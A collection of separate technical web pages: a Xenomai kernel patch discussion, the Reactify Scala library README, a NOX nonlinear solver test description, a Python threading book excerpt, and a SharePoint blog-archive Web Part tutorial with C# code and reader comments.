*/ xnpod_schedule(); - - xnlock_put_irqrestore(&nklock, s); } /** @@ -366,7 +377,7 @@ int rt_queue_delete_inner(RT_QUEUE *q, void __user *mapaddr) /* * The queue descriptor has been marked as deleted before we - * released the superlock thus preventing any sucessful + * released the superlock thus preventing any successful * subsequent calls of rt_queue_delete(), so now we can * actually destroy the associated heap safely. */ diff --git a/ksrc/skins/native/syscall.c b/ksrc/skins/native/syscall.c index 28c720e..a75ed3b 100644 --- a/ksrc/skins/native/syscall.c +++ b/ksrc/skins/native/syscall.c @@ -2073,24 +2073,17 @@ static int __rt_queue_delete(struct pt_regs *regs) { RT_QUEUE_PLACEHOLDER ph; RT_QUEUE *q; - int err; if (__xn_safe_copy_from_user(&ph, (void __user *)__xn_reg_arg1(regs), sizeof(ph))) return -EFAULT; - q = (RT_QUEUE *)xnregistry_fetch(ph.opaque); - - if (!q) - err = -ESRCH; - else { - /* Callee will check the queue descriptor for validity again. */ - err = rt_queue_delete_inner(q, (void __user *)ph.mapbase); - if (!err && q->cpid) - xnfree(q); - } + q = xnregistry_fetch(ph.opaque); + if (q == NULL) + return -ESRCH; - return err; + /* Callee will check the queue descriptor for validity again. */ + return rt_queue_delete_inner(q, (void __user *)ph.mapbase); } /* @@ -2604,24 +2597,17 @@ static int __rt_heap_delete(struct pt_regs *regs) { RT_HEAP_PLACEHOLDER ph; RT_HEAP *heap; - int err; if (__xn_safe_copy_from_user(&ph, (void __user *)__xn_reg_arg1(regs), sizeof(ph))) return -EFAULT; - heap = (RT_HEAP *)xnregistry_fetch(ph.opaque); - - if (!heap) - err = -ESRCH; - else { - /* Callee will check the heap descriptor for validity again. */ - err = rt_heap_delete_inner(heap, (void __user *)ph.mapbase); - if (!err && heap->cpid) - xnfree(heap); - } + heap = xnregistry_fetch(ph.opaque); + if (heap == NULL) + return -ESRCH; - return err; + /* Callee will check the heap descriptor for validity again. 
*/ + return rt_heap_delete_inner(heap, (void __user *)ph.mapbase); } /* > But I still think this approach has too complex (and so far > undocumented) user-visible semantics and is going the wrong path. > Granted, this is a bit convoluted. This stems from the fact that should a shared heap deletion fail due to -EBUSY, you have to keep the mapping alive for other threads sharing the same mm context that the caller, so that the memory segment does not get wiped away "inadvertently". This is basically why the last unmapping is done by the nucleus itself, since all the tested conditions for the deletion to succeed have to be done from a syscall context in order to preserve atomicity. However, the only undocumented behavior is that failing to delete a heap keeps its descriptor alive, thus allowing further bindings to it; which is basically what a failing rmmod allows for a module for instance. People can live with this for now. > > xnlock_put_irqrestore(&nklock, s); > > + > > +#ifdef CONFIG_XENO_OPT_PERVASIVE > > + if (heap->cpid) > > + xnfree(heap); > > +#endif > > } > > > > /** > > diff --git a/ksrc/skins/native/queue.c b/ksrc/skins/native/queue.c > > index 527bde8..50af544 100644 > > --- a/ksrc/skins/native/queue.c > > +++ b/ksrc/skins/native/queue.c > > @@ -303,6 +303,11 @@ static void __queue_post_release(struct xnheap *heap) > > xnpod_schedule(); > > > > xnlock_put_irqrestore(&nklock, s); > > + > > +#ifdef CONFIG_XENO_OPT_PERVASIVE > > + if (q->cpid) > > + xnfree(q); > > +#endif > > } > > > > /** > > > >> I'm not sure if that object migration to the global queue helps to some > >> degree here (it's not really useful due to other problems, will post a > >> removal patch) - I've build Xenomai support into the kernel... > >> > > > > This is a last resort action mainly aimed at kernel-based apps, assuming > > that rmmoding them will ultimately flush the pending objects. We need > > this. 
> > Kernel-based apps do not stress this path at all, their objects are > already in the global queue. Only user-allocated objected can be requeued. > When I'm reading "will post a removal patch", I tend to have a Pavlovian reaction considering that you want to remove all the global queue mechanism, which is what I nacked. No objection to stop using it for userland resources though. > And that either indicates open issues in the cleanup path (ie. some > objects may practically never be deleted) or is superfluous as a > deferred cleanup mechanism will take care (namely the one of the xnheap). > > > > > We might want to avoid linking to the global queue whenever the deletion > > call returns -EBUSY though, assuming that a post-release hook will do > > the cleanup, but other errors may still happen. > > Even more important: -EIDRM, or we continue to risk serious corruptions. > Better remove this altogether. > -EBUSY is returned precisely because the heap is still in a sane state; obviously, if you want to kill the front end descriptor instead, then -EIDRM would be required, no problem with this. But there is no risk of corruption today if one uses the internal deletion protocol properly. > > > >>>> I'm in the process of fixing this, but that latter two are tricky. They > >>>> need user space information (the user space address of the mapping base) > >>>> for ordinary cleanup, and this is not available otherwise. > >>>> > >>>> At the time we are called with our cleanup handler, can we assume that > >>>> the dying process has already unmapped all its rtheap segments? > >>> Unfortunately, no. Cleanup is a per-skin action, and the process may be > >>> bound to more than a single skin, which could turn out as requiring a > >>> sequence of cleanup calls. 
> >>> > >>> The only thing you may assume is that an attempt to release all memory > >>> mappings for the dying process will have been done prior to receive the > >>> cleanup event from the pipeline, but this won't help much in this case. > >> That's already very helpful! > >> > > > > Not really, at least this is not relevant to the bug being fixed. > > Additionally, the release attempt may fail due to pending references. > > For which kind of objects? What kind of references? At least according > to the docs, there is only the risk of -EBUSY with heaps and queues. All > other objects terminate properly. I'm talking bout internal references. The deletion caller has to maintain a numaps reference on the object it destroys while it makes sure the deletion may be applied. Most of the logic stems from this. > > > > >>> This attempt may fail and be postponed though, hence the deferred > >>> release callback fired via vmclose. > >> I already started to look into the release callback thing, but I'm still > >> scratching my head: Why do you set the callback even on explicit > >> rt_heap/queue_delete? I mean those that are supposed to fail with -EBUSY > >> and then to be retried by user land? > > > > Userland could retry, but most of the time it will just bail out and > > leave this to vmclose. > > > >> What happens if rt_heap_unbind and > >> retried rt_heap_delete race? > >> > > > > A successful final unmapping clears the release handler. > > rt_heap_unbind would trigger the release handler, thus the object > deletion, and the actual creator would find the object destroyed under > its feet despite failed deletion is supposed to leave the object intact. > That's the kind of complex semantics I was referring to. You seem to be mixing heaps, queues and other objects. As far as those are concerned, the creator still holds a reference, so unbinding them would not trigger the release handler. 
> > Let's get this right: If the creator of a shared semaphore deletes that > object, it's synchronously removed; anyone trying to use it is informed. > That's reasonable to expect from heaps and queues as well, IMHO. The > only exception is the mapped memory of the associated heaps. It must not > vanish under other users feet. But they will no longer be able to issue > native commands on those objects. > Yes, we are still discussing the option of invalidating the front-end object upon deletion, regardless of what has to be done with the backend resource, fair enough. I agree this is a common pattern, but this is not immediately required to have a correct behavior. > > > >> Anyway, auto-cleanup of heap and queue must be made none-failing, ie. > >> the objects have to be discarded, just the heap memory deletion has to > >> be deferred. I'm digging into this direction, but I'm still wondering if > >> the none-automatic heap/queue cleanup is safe in its current form. > >> > > > > This seems largely overkill for the purpose of fixing the leak. Granted, > > the common pattern would rather be to invalidate the front-end object > > (heap/queue desc) and schedule a release for the backend one (i.e. > > shared mem). However, the only impact this has for now is to allow apps > > to keep an object indefinitely busy by binding to it continuously albeit > > a deletion request is pending; I don't think this deserves a major > > change in the cleanup actions at this stage of 2.5. Cleanup stuff > > between userland and kernel space is prone to regression. > > It's not overkill, it's required to reduce complexity, simplify the > semantics, and reducing risks of more hidden bugs in yet unstressed > corner cases. IMHO, -EBUSY on rt_heap/queue_delete is inappropriate. > Well, I can tell you that there are quite a few corner cases you would face in rewriting the queue/heap cleanup code. I'm not saying this should not be done, I just won't merge this to 2.5.0 to avoid more regressions. 
Let's fix the obvious for now, such as the missing descriptor deallocation in the post-release callback, and schedule a global cleanup refactoring for 2.5.1. > Jan > -- Philippe. _______________________________________________ Xenomai-core mailing list Xenomai-core@gna.org
https://www.mail-archive.com/xenomai-core@gna.org/msg07455.html
reactify

The first and only true Functional Reactive Programming framework for Scala.

Justification

How can we say it's the first true FRP framework for Scala? Simple: because it is. All other frameworks add special framework-specific functions to do things like math (ex. adding two variables together), collection building (ex. a special implementation of ::: to concatenate two variables containing lists), or similar mechanisms to Scala's built-in collection manipulation (ex. map). These are great and mostly fill in the gaps necessary to solve your problems. But the goal for Reactify was a bit loftier. We set out to create a system that actually allows you to use ANY Scala functionality just like you would normally, without any special magic (like Scala.rx's special operations require). In Reactify you just write code like you normally would, and as the Vars and Vals used change, the reactive properties they have been assigned to will update as well. If you need a bit more clarification on just what the heck we mean, jump ahead to the More Advanced Examples.

Setup

reactify is published to Sonatype OSS and Maven Central, currently supporting:

- Scala and Scala.js (2.11, 2.12, and 2.13)
- Scala Native (2.11)
- Scala 3 / Dotty (0.26)

Configuring the dependency in SBT simply requires:

libraryDependencies += "com.outr" %% "reactify" % "4.0.2"

or, for Scala.js / Scala Native / cross-building:

libraryDependencies += "com.outr" %%% "reactify" % "4.0.2"

Concepts

This framework is intentionally meant to be a simplistic take on properties and functional reactive concepts. There are only four specific classes that really need be understood to take advantage of the framework:

- Reactive - As the name suggests, a simple trait that fires values that may be reacted to by Reactions.
- Channel - The most simplistic representation of a Reactive; simply provides a public := to fire events. No state is maintained.
- Val - Exactly as it is in Scala, this is a final variable. What is defined at construction is immutable. However, the contents of the value, if they are Reactive, may change the ultimate value of this, so it is Reactive itself and holds state.
- Var - Similar to Val except it is mutable, as it mixes in Channel to allow setting of the current value.

Val and Var may hold formulas with Reactives. These Reactives are listened to when assigned, so the wrapping Val or Var will also fire an appropriate event. This allows complex values to be built off of other variables.

Using

Imports

Reactify is a very simple framework, and though you'll likely want access to some of the implicit conversions made available in the package, everything can be had with a single import:

import reactify._

Creating

As discussed in the concepts, there are only four major classes in Reactify (Reactive, Channel, Val, and Var). Of those classes, unless you are creating a custom Reactive, you will probably only deal with the latter three. Creating instances is incredibly simple:

val myChannel = Channel[String]  // Creates a Channel that receives Strings
val myVar = Var[Int](5)          // Creates a Var containing the explicit value `5`
val myVal = Val[Int](myVar + 5)  // Creates a Val containing the sum of `myVar` + `5`

Listening for Changes

This would all be pretty pointless if we didn't have the capacity to listen to changes on the values. Here we're going to listen to myVal and println the new value when it changes:

myVal.attach { newValue =>
  println(s"myVal = $newValue")
}

Modifying the Value

Since myVal is a Val it is immutable itself, but its value is derived from the formula myVar + 5. This means that a change to myVar will cause the value of myVal to change as a result:

myVar := 10

The above code modifies myVar to have the new value of 10. This will also cause myVal to re-evaluate and have the new value of 15 (myVar + 5).
As a result, the observer we attached above will output:

myVal = 15

Derived Values

You can do clever things like define a value that is derived from other values:

val a = Var("One")
val b = Var("Two")
val c = Var("Three")
val list = Val(List(a, b, c))

list()  // Outputs List("One", "Two", "Three")

a := "Uno"
b := "Dos"
c := "Tres"

list()  // Outputs List("Uno", "Dos", "Tres")

More Advanced Examples

This is all pretty neat, but it's the more complex scenarios that show the power of what you can do with Reactify:

Complex Function with Conditional

val v1 = Var(10)
val v2 = Var("Yes")
val v3 = Var("No")
val complex = Val[String] {
  if (v1 > 10) {
    v2
  } else {
    v3
  }
}

Any changes to v1, v2, or v3 will fire a change on complex, and the entire inlined function will be re-evaluated.

Multi-Level Reactive

A much more advanced scenario is when you have a Var that contains a class that has a Var, and you want to keep track of the resulting value no matter what the first Var's instance is currently set to. Consider the following two classes:

class Foo {
  val active: Var[Boolean] = Var(false)
}

class Bar {
  val foo: Var[Option[Foo]] = Var[Option[Foo]](None)
}

A Bar has a Var foo that holds an Option[Foo]. Now, say I have a Var[Option[Bar]]:

val bar: Var[Option[Bar]] = Var[Option[Bar]](None)

If we want to determine active on Foo, we have several layers of mutability between the optional bar Var, the optional foo Var, and then the ultimate active Var in Foo. For a one-off we could do something like:

val active: Boolean = bar().flatMap(_.foo().map(_.active())).getOrElse(false)

This would give us true only if there is a Bar, Bar has a Foo, and active is true. But if we want to listen for when that changes at any level (Bar, Foo, and active), it should be just as easy.
Fortunately, with Reactify it is:

val active: Val[Boolean] = Val(bar().flatMap(_.foo().map(_.active())).getOrElse(false))

Yep, it's that easy. Now if I set bar to Some(new Bar), then foo := Some(new Foo) on that, and finally set active to true on Foo, my active Val will fire that it has changed. Reactify will monitor every level of the Vars and automatically update itself and fire when the resulting value from the function above has changed.

// Monitor the value change
active.attach { b =>
  ... do something ...
}

// Set Bar
val b = new Bar
bar := Some(b)

// Set Foo
val f = new Foo
b.foo := Some(f)

// Set active
f.active := true

With Reactify you don't have to do any magic in your code; you just write Scala code the way you always have and let Reactify handle the magic.

Channels

As we saw above, Var and Val retain the state of the value assigned to them. A Channel, on the other hand, is like a Var (in that you can set values to it), but no state is retained. This is useful for representing firing of events or some other action that is meant to be observed but not stored.

Nifty Features

Dependency Variables

The core functionality is complete and useful, but we can build upon it for numeric values that are dependent on other numeric values, or numeric values that may have multiple representations. For example, consider a graphical element on screen. It may have a left position for the X value originating on the left side of the element, but if we want to right-align something we have to make sure we account for the width in doing so, and vice-versa for determining the right edge. We can simplify things by leveraging a Dep instance to represent it:

val width: Var[Double] = Var(0.0)
val left: Var[Double] = Var(0.0)
val center: Dep[Double, Double] = Dep(left)(_ + (width / 2.0), _ - (width / 2.0))
val right: Dep[Double, Double] = Dep(left)(_ + width, _ - width)

Notice we've even added a center representation.
These are dependent on left, but their value is derived from a formula based on left and width. Of course, if representing the value alone were all we cared about, then a simple Val(left + width) could be used as our right value, but we also want to be able to modify center or right and have it properly reflect in left. Any changes made to a Dep will properly update the variable it depends on (left, in this case). See DepsSpec for more detailed examples. Dep also supports conversions between different types as well.

Binding

As of 1.6 you can now do two-way binding incredibly easily:

val a = Var[String]("Hello")
val b = Var[String]("World")
val binding = a bind b

By default this will assign the value of a to b, and then changes to either will propagate to the other. If you want to detach the binding:

binding.detach()

This will disconnect the two to operate independently of each other again. You can also do different typed binding:

implicit val s2i: String => Int = (s: String) => Integer.parseInt(s)
implicit val i2s: Int => String = (i: Int) => i.toString

val a = Var[String]("5")
val b = Var[Int](10)
a bind b

We need implicits to be able to convert between the two, but now changes to one will propagate to the other.
https://index.scala-lang.org/outr/reactify/props/1.1.0?target=_2.11
#include "NOX.H" #include "NOX_Common.H" #include "NOX_Utils.H" #include "NOX_LAPACK_Group.H" This test problem is a modified extension of the "Broyden Tridiagonal Problem" from Jorge J. More', Burton S. Garbow, and Kenneth E. Hillstrom, Testing Unconstrained Optimization Software, ACM TOMS, Vol. 7, No. 1, March 1981, pp. 14-41. The modification involves squaring the last equation fn(x) and using it in a homotopy-type equation. The parameter "lambda" is a homotopy-type parameter that may be varied from 0 to 1 to adjust the ill-conditioning of the problem. A value of 0 is the original, unmodified problem, while a value of 1 is that problem with the last equation squared. Typical values for increasingly ill-conditioned problems might be 0.9, 0.99, 0.999, etc. The standard starting point is x(i) = -1, but setting x(i) = 0 tests the selected global strategy.
http://trilinos.sandia.gov/packages/docs/r6.0/packages/nox/doc/html/Broyden_8C.html
Core Python: Comparing Single vs. Multithread Execution

This is an excerpt from Wesley Chun's recent book Core Python Applications Programming, from the chapter on multithreaded programming. The script below executes a set of recursive functions first in single-threaded fashion, followed by the alternative with multiple threads.

#!/usr/bin/env python

from myThread import MyThread
from time import ctime, sleep

def fib(x):
    sleep(0.005)
    if x < 2: return 1
    return (fib(x-2) + fib(x-1))

def fac(x):
    sleep(0.1)
    if x < 2: return 1
    return (x * fac(x-1))

def sum(x):
    sleep(0.1)
    if x < 2: return 1
    return (x + sum(x-1))

funcs = [fib, fac, sum]
n = 12

def main():
    nfuncs = range(len(funcs))

    print '*** SINGLE THREAD'
    for i in nfuncs:
        print 'starting', funcs[i].__name__, 'at:', \
            ctime()
        print funcs[i](n)
        print funcs[i].__name__, 'finished at:', \
            ctime()

    print '\n*** MULTIPLE THREADS'
    threads = []
    for i in nfuncs:
        t = MyThread(funcs[i], (n,), funcs[i].__name__)
        threads.append(t)

    for i in nfuncs:
        threads[i].start()

    for i in nfuncs:
        threads[i].join()
        print threads[i].getResult()

    print 'all DONE'

if __name__ == '__main__':
See the original article here. Opinions expressed by DZone contributors are their own.
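As a companion to the excerpt, here is a rough Python 3 translation of the same experiment. It is a sketch, not the book's code: the original relies on a MyThread helper class that is not shown in the excerpt, so plain threading.Thread is used instead, and sum is renamed total to avoid shadowing the built-in.

```python
import threading
import time

def fib(x):
    time.sleep(0.005)
    if x < 2:
        return 1
    return fib(x - 2) + fib(x - 1)

def fac(x):
    time.sleep(0.1)
    if x < 2:
        return 1
    return x * fac(x - 1)

def total(x):
    time.sleep(0.1)
    if x < 2:
        return 1
    return x + total(x - 1)

def run_single(funcs, n):
    # Call each function in turn on the main thread.
    return {f.__name__: f(n) for f in funcs}

def run_threaded(funcs, n):
    # One thread per function; sleep() releases the GIL, so the
    # artificial delays overlap and total wall time drops.
    results = {}

    def worker(f):
        results[f.__name__] = f(n)

    threads = [threading.Thread(target=worker, args=(f,)) for f in funcs]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results

if __name__ == '__main__':
    funcs = [fib, fac, total]
    start = time.time()
    print('single:  ', run_single(funcs, 6), round(time.time() - start, 2), 'sec')
    start = time.time()
    print('threaded:', run_threaded(funcs, 6), round(time.time() - start, 2), 'sec')
```

On a typical run the threaded pass finishes in roughly the time of the slowest function rather than the sum of all three, which is the point the excerpt is making.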
https://dzone.com/articles/book-excerpt-core-python
After populating the Tree View nodes, I had to handle the SelectedNodeChanged event to redirect to the Date.aspx page and pass the correct StartDateTime and EndDateTime query string parameters. The query string structure is fairly easy: you need to supply the time span parameters and the title. For example, to get all the posts in December 2011 the URL should look like this:. Notice that the start and end times are passed in ISO8601 format.

<SharePoint:CssRegistration
    Name="<% $SPUrl:~sitecollection/_layouts/styles/SharePointStack/SPBlogTemplate/SPBlogTemplate.css %>">
</SharePoint:CssRegistration>
<div id="SPBlogContainer">
    <div id="ArchiveSummaryTitle"><a id="ViewArchive" title="Click to view Archive" runat="server">Archives</a></div>
    <asp:TreeView ID="ArchiveSummaryTree" runat="server" ExpandDepth="0"
        OnSelectedNodeChanged="ArchiveSummaryTree_SelectedNodeChanged">
    </asp:TreeView>
    <asp:Literal ID="ArchiveSummaryErrors" runat="server"></asp:Literal>
</div>

The markup is straightforward: I place a title, a Tree View, and a Literal. I had to apply some CSS formatting to make sure that the Web Part looks like a SharePoint control. I created a CSS file and placed it under the STYLES mapped folder. The CSS helped me adjust the padding and text formatting.
#ArchiveSummaryTitle
{
    color: #0072bc;
    font-size: 1.2em;
    font-weight: normal;
}

#SPBlogContainer
{
    padding-left: 11px;
}

namespace SharePointStack.SPBlogTemplate
{
    class SPBlogPost
    {
        public SPBlogPost(string title, string month, string year)
        {
            postTitle = title;
            publishingMonth = month;
            publishingYear = year;
        }

        private string postTitle;

        public string PostTitle
        {
            get { return postTitle; }
            set { postTitle = value; }
        }

        private string publishingMonth;

        public string PublishingMonth
        {
            get { return publishingMonth; }
            set { publishingMonth = value; }
        }

        private string publishingYear;

        public string PublishingYear
        {
            get { return publishingYear; }
            set { publishingYear = value; }
        }
    }
}

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web.Caching;
using System.Web.UI;
using System.Web.UI.WebControls;
using Microsoft.SharePoint;
using Microsoft.SharePoint.Utilities;

namespace SharePointStack.SPBlogTemplate.ArchiveSummary
{
    public partial class ArchiveSummaryUserControl : UserControl
    {
        static object _lock = new object();
        List<SPBlogPost> postsBuffer = new List<SPBlogPost>();
        List<int> years = new List<int>();
        string[] months = { "January", "February", "March", "April", "May", "June", "July", "August",
                            "September", "October", "November", "December" };
        bool duplicates;

        protected void Page_Load(object sender, EventArgs e)
        {
            if (!Page.IsPostBack)
            {
                try
                {
                    // I chose "using" to automatically dispose SharePoint objects
                    using (SPSite blogSiteCollection = SPContext.Current.Site)
                    {
                        using (SPWeb blogWeb = blogSiteCollection.OpenWeb(SPContext.Current.Web.ServerRelativeUrl))
                        {
                            SPList blogPosts = blogWeb.Lists["Posts"];

                            // Set the header link
                            ViewArchive.HRef = blogPosts.DefaultViewUrl;

                            SPQuery queryPosts = new SPQuery();

                            // CAML query that returns only published posts and orders them by date
                            queryPosts.Query = "<OrderBy><FieldRef Name='PublishedDate'/></OrderBy>" +
                                "<Where><Eq><FieldRef Name='_ModerationStatus' />" +
                                "<Value Type='ModStat'>0</Value></Eq></Where>";

                            // Pull the query results directly from the Cache; we don't want to query
                            // SharePoint every time the Archives Summary Web Part runs. This practice
                            // increases performance and comes in very handy if the user is an active blogger.
                            SPListItemCollection publishedPosts = (SPListItemCollection)Cache["PublishedPosts"];

                            // If the query results are not available in the Cache, then we need to execute
                            // the query and store the results in the Cache for the next request.
                            // The Cache is set with a sliding expiration of 1 day.
                            if (publishedPosts == null)
                            {
                                // Since SPWeb is not thread safe, we need to place a lock.
                                lock (_lock)
                                {
                                    // Ensure that the data was not loaded by a concurrent thread
                                    // while waiting for the lock.
                                    publishedPosts = (SPListItemCollection)Cache["PublishedPosts"];
                                    if (publishedPosts == null)
                                    {
                                        publishedPosts = blogPosts.GetItems(queryPosts);
                                        Cache.Add("PublishedPosts", publishedPosts, null, Cache.NoAbsoluteExpiration,
                                            TimeSpan.FromDays(1), CacheItemPriority.High, null);
                                    }
                                }
                            }

                            // Load all published posts into the postsBuffer. The query results will not be
                            // available outside the "using" block.
                            foreach (SPListItem post in publishedPosts)
                                postsBuffer.Add(new SPBlogPost(post["Title"].ToString(),
                                    DateTime.Parse(post["PublishedDate"].ToString()).Month.ToString(),
                                    DateTime.Parse(post["PublishedDate"].ToString()).Year.ToString()));
                        }
                    }

                    // Provision years
                    foreach (SPBlogPost post in postsBuffer)
                        years.Add(int.Parse(post.PublishingYear));

                    // Make sure we only have distinct years that are sorted in descending order
                    var yearsList = years.Distinct().ToList();
                    yearsList.Sort();
                    yearsList.Reverse();

                    // Add the years to the Tree View
                    foreach (int year in yearsList)
                        ArchiveSummaryTree.Nodes.Add(new TreeNode(year.ToString()));

                    // Find out which months have posts in each year and add them to the Tree View as child nodes
                    foreach (TreeNode year in ArchiveSummaryTree.Nodes)
                    {
                        for (int i = 12; i >= 1; i--)
                        {
                            foreach (SPBlogPost post in postsBuffer)
                            {
                                if (post.PublishingMonth == i.ToString() && post.PublishingYear == year.Text)
                                {
                                    duplicates = false;
                                    foreach (TreeNode item in year.ChildNodes)
                                    {
                                        // Check for any duplicate month entries.
                                        // This becomes an issue if the user publishes more than one post in a month.
                                        if (item.Text.ToLower() == months[int.Parse(post.PublishingMonth) - 1].ToLower())
                                            duplicates = true;
                                    }
                                    if (!duplicates)
                                        year.ChildNodes.Add(new TreeNode(months[int.Parse(post.PublishingMonth) - 1],
                                            post.PublishingMonth, null, null, null));
                                }
                            }
                        }
                    }

                    // Expand the latest year node
                    if (ArchiveSummaryTree.Nodes[0] != null)
                        ArchiveSummaryTree.Nodes[0].Expand();
                }
                catch (Exception ex)
                {
                    // Print the error message to the user using a Literal
                    ArchiveSummaryErrors.Text = "<img src='" + SPContext.Current.Site +
                        "_layouts/images/SharePointStack/SPBlogTemplate/error.png' alt='Error' style='display: block;' />" +
                        " <font color='#ff0000' size='12'>" + ex.Message + "</font>";
                }
                finally
                {
                    // Objects will be disposed during the next Garbage Collector run
                    postsBuffer = null;
                    years = null;
                }
            }
        }

        protected void ArchiveSummaryTree_SelectedNodeChanged(object sender, EventArgs e)
        {
            TreeView summaryLinks = (TreeView)sender;

            // Make sure that this is a month node; we don't want to handle a year node selection change
            if (summaryLinks.SelectedNode.Parent != null)
            {
                string month = string.Empty, year = string.Empty;
                month = summaryLinks.SelectedNode.Value;
                year = summaryLinks.SelectedNode.Parent.Value;

                // Build the date strings to be converted later on to ISO8601 dates
                string startDate = month + "/1/" + year;
                string endDate = startDate;

                // Convert the dates and set the range to be a one-month time span
                startDate = SPUtility.CreateISO8601DateTimeFromSystemDateTime(DateTime.Parse(startDate));
                endDate = SPUtility.CreateISO8601DateTimeFromSystemDateTime(DateTime.Parse(startDate).AddMonths(1));

                // Build the URL and set the query string parameters for redirection to the Date.aspx page
                string url = SPContext.Current.Site + SPContext.Current.Web.ServerRelativeUrl +
                    "/Lists/Posts/Date.aspx?StartDateTime=" + startDate + "&EndDateTime=" + endDate +
                    "&LMY=" + months[int.Parse(month) - 1] + ", " + year;

                summaryLinks.Dispose();

                // SharePoint adds "SPSite Url=" to the URL we built; Substring removes it.
                Response.Redirect(url.Substring(11));
            }
        }
    }
}

Web Part Source Code Download

Super 🙂 Just tried it and it works. Thanks!

I am glad you like it, Jorgan 🙂

Any plans for implementing in sandbox?

In VS11 you can build Visual Web Parts to run with the Sandbox subset. No need for rewriting the Web Part 🙂

I installed your webpart and it is not working for me. I receive a 404 error when clicking on the tree nodes for archived months.

Hi Charles, can you please post the blog site URL and the URL you are redirected to by the tree nodes (404)? I think you are being redirected to a wrong URL.

Thanks for the response. The blog site is on a site behind our company firewall. The URL of the blog is the same after clicking on the archive link as shown in the pics.…/photostream…/photostream

Hi Charles, I need the URL, or at least a hint of how it looks before you click and how it becomes after you click and get the 404, from the address bar, not the status bar please 🙂

I can't seem to get this to work. I installed the webpart and made postings dated "back in time". As I understand it, the tree view is then supposed to create the months automatically, but that doesn't happen. What am I doing wrong?

Hi Kathrine, can you please send a screenshot? As you can see in my code above, I query the Posts list for any published posts regardless of when they were posted. Are these posts published?

Hello Bandar, I just went in to look a bit more at the issue and found that it had picked up the postings I did yesterday. Do you have any idea what could cause that? Please let me know if a screendump would still help after this piece of information.
Thank you for the great work on this webpart and your help.

No worries, Kathrine 🙂 When I query the Posts list, I first check if it is available in the cache:

SPListItemCollection publishedPosts = (SPListItemCollection)Cache["PublishedPosts"];

and if it is not, then I execute the query and push the results into the cache, which lives for one day:

publishedPosts = blogPosts.GetItems(queryPosts);
Cache.Add("PublishedPosts", publishedPosts, null, Cache.NoAbsoluteExpiration,
    TimeSpan.FromDays(1), CacheItemPriority.High, null);

So every time you add a post, you will have to wait till the next day, or you can execute an IISReset 🙂 And if you like coding, you can always amend the source code and remove the cache logic or minimize the cache life. The code is well documented, so it will be a fairly easy task.

Hello Bandar, that makes sense. Thank you! 🙂 BR, Kathrine

You are most welcome 🙂

Hello again. We have now deployed the webpart in our production environment and somehow it isn't working as it should. The webpart displays the months as it should, but when clicking on each month it still shows all posts, instead of the posts from that specific month. I have checked the URL and compared it to the URL in the test environment, and they both look like this:

Test environment (works):
/Lists/Posts/Date.aspx?StartDateTime=2012-02-01T00:00:00Z&EndDateTime=2012-03-01T01:00:00Z&LMY=February,%202012

Production (shows all posts):
/Lists/Posts/Date.aspx?StartDateTime=2012-04-01T00:00:00Z&EndDateTime=2012-05-01T02:00:00Z&LMY=April,%202012

I am really puzzled as to why this isn't working. Can you help out? Thank you, Kathrine

I am trying to deploy the web part but I do not know how I can use it.

Sorry, scratch my last post. It seems to be working now. Thanks. Dave

Sorry, me again! It seems to be working insofar as the list of years and months is produced. However, when one clicks on an entry no posts are displayed. This is because the StartDateTime and EndDateTime URL parameters appear to be wrong:

http://<blogURL>/Lists/Posts/Date.aspx?StartDateTime=2012-01-11T00:00:00Z&EndDateTime=2012-02-11T00:00:00Z&LMY=November,%202012

Note that the start is listed as 2012-01-11 and the end as 2012-02-11, whereas they should be 2012-11-01 and 2012-11-30. This looks like a localisation issue perhaps (I'm in the UK)? Thanks, Dave

Hi! I need help deploying this. Can this be deployed at the site level or must it be deployed at the farm level only? Thank you!

I am trying to deploy this webpart. Can it be deployed at the site level or must it be deployed at the farm level?

Hi Dave, does it work if you flip the day and month in the query string? If yes, then I guess it's related to the culture settings; never thought of that when I wrote the web part loool. Please let me know what you find out.

Hi Matt, unfortunately no, this is a farm solution with a feature on the collection level to activate/deactivate. A quick workaround would be using the VS2012 Visual WebPart template, which can be deployed later as a Sandbox solution. Please let me know if you need support with it.

Is it possible in SharePoint 2013 out of the box?

Thanks for this. I just fixed some translation issues with this webpart and submitted a patch to CodePlex. I hope you can apply the patch and make it available as a new version. I'm just a noob with C# and web parts, but let's hope the patch is fine 😉

Does this one work on SP2013? If so, can someone post a guide on how to install it?

Hi, this solution seems to be very useful. How can we add this code into SharePoint 2013? Is it possible to do these things in SharePoint 2013? If possible, how? Can you help me please?

Yes, it should work in SP2013. It's just aggregating list items and rendering the content. What do you need help with, deployment? Do you have specific questions, or have you just never deployed farm solutions before?

In both cases I am here 🙂

Same issue here. SP13 seems to not like the wsp file. I am getting this message: "The file you imported is not valid. Verify that the file is a Web Part description file (*.webpart or *.dwp) and that it contains well-formed XML."

You can't use the same WSP file; you will have to download the source, reference the right assemblies, and then package. The code will work of course, no changes needed. If you can't do it, then I will do it over the weekend and add it to the post. Let me know if you want me to 🙂

Any chance you did this for SP2013 or SP Online? This is exactly what I need. Please help? Thanks, Sam

Hi, did you ever get the chance to repackage it so it can be used with SharePoint 2013? This can be very useful for those migrating blogs from different sources to SP. Great work! Thanks

Hi, I want to create an archive like this: November 2007 (2), February 2006 (1)… but I don't have Visual Studio, so how can I create this kind of archive with SharePoint Designer only? Please suggest. Thanks, RenuSh

Hi Bandar, your webpart looks exactly like what I've been looking for since ages. Unfortunately I only have Office 365's SharePoint, and no clue on how to create a new webpart from code (and no Visual Studio either). Could you please please please 🙂 supply the SP13 packaged version you were talking about? Thank you very much
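A side note on the date maths the comments above keep running into: computing a one-month StartDateTime/EndDateTime window is more robust when done with explicit year/month components rather than culture-dependent string parsing. Here is the same idea sketched in Python purely for illustration (the Web Part itself does this in C# via SPUtility.CreateISO8601DateTimeFromSystemDateTime; this helper is not part of the original code):

```python
from datetime import datetime

def month_range_iso8601(month, year):
    """Return (start, end) ISO8601 timestamps covering one whole month."""
    start = datetime(year, month, 1)
    # First day of the following month, rolling December over into January.
    if month == 12:
        end = datetime(year + 1, 1, 1)
    else:
        end = datetime(year, month + 1, 1)
    fmt = '%Y-%m-%dT%H:%M:%SZ'  # same shape as the query string parameters above
    return start.strftime(fmt), end.strftime(fmt)

print(month_range_iso8601(12, 2011))
# → ('2011-12-01T00:00:00Z', '2012-01-01T00:00:00Z')
```

Because the month and year are passed as integers, there is no day/month ambiguity of the kind Dave hit with UK locale settings.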
https://blogs.msdn.microsoft.com/balsharfi/2012/01/01/an-alternative-archives-web-part-to-solve-the-pre-dated-posts-provisioning-in-the-ootb-blog-site-archives-web-part/
